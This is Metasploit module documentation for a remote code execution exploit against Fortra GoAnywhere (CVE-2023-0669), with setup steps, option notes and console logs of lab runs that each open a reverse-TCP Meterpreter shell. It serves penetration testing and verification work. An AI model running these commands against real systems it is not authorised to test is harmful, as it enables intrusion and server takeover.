## Vulnerable Application

The vulnerable application is Fortra GoAnywhere. Currently, all versions are
vulnerable. The version I'm testing on is 7.1.1. You can get a free one-week
trial if you sign up on their site, but I don't think you actually need to
register - you can just create a free account and download the application.

## Verification Steps

1. Install the application
1. Start the application on the server with `./goanywhere.sh start`
1. Start msfconsole
1. Do: `use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669`
1. Set `LHOST` / `RHOST`
1. Do: `run`
1. You should get a shell.

## Options

### TARGET_URI

Set to the base path for the exploit - the default (`/goanywhere/lic/accept`) is usually fine.

### Version

The version number of the encryption, which is appended to the encrypted text.
Changing the target will change this, but normally you don't have to tweak this.

Some hosts (like in FIPS-compliant mode) don't allow version 1, but presumably
there are older hosts that don't support version 2.

### EncryptionKey / EncryptionIv / EncryptionAlgorithm

How to encrypt the object. Depending on the `Version`, there are different
keys. This is updated when you change TARGET and probably doesn't need to be
changed.

## Scenarios

### Version 7.1.1 on Fedora Linux

```
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
RHOSTS => 10.0.0.219

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Sending stage (24380 bytes) to 10.0.0.219
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.219:46860) at 2023-02-06 14:32:50 -0800

meterpreter > getuid
Server username: ron
```

### Using an earlier encryption version

```
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
RHOSTS => 10.0.0.219

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set TARGET 1
TARGET => 1

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > show options

[...]


Exploit target:

   Id  Name
   --  ----
   1   Version 1 Encryption



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Sending stage (24380 bytes) to 10.0.0.219
[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.219:46862) at 2023-02-06 14:33:41 -0800

meterpreter > 
```

# Version 7.1.1 over HTTP

```
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
RHOSTS => 10.0.0.219

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RPORT 8000
RPORT => 8000

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[*] Sending stage (24380 bytes) to 10.0.0.219
[*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.219:46864) at 2023-02-06 14:35:06 -0800

meterpreter >
```
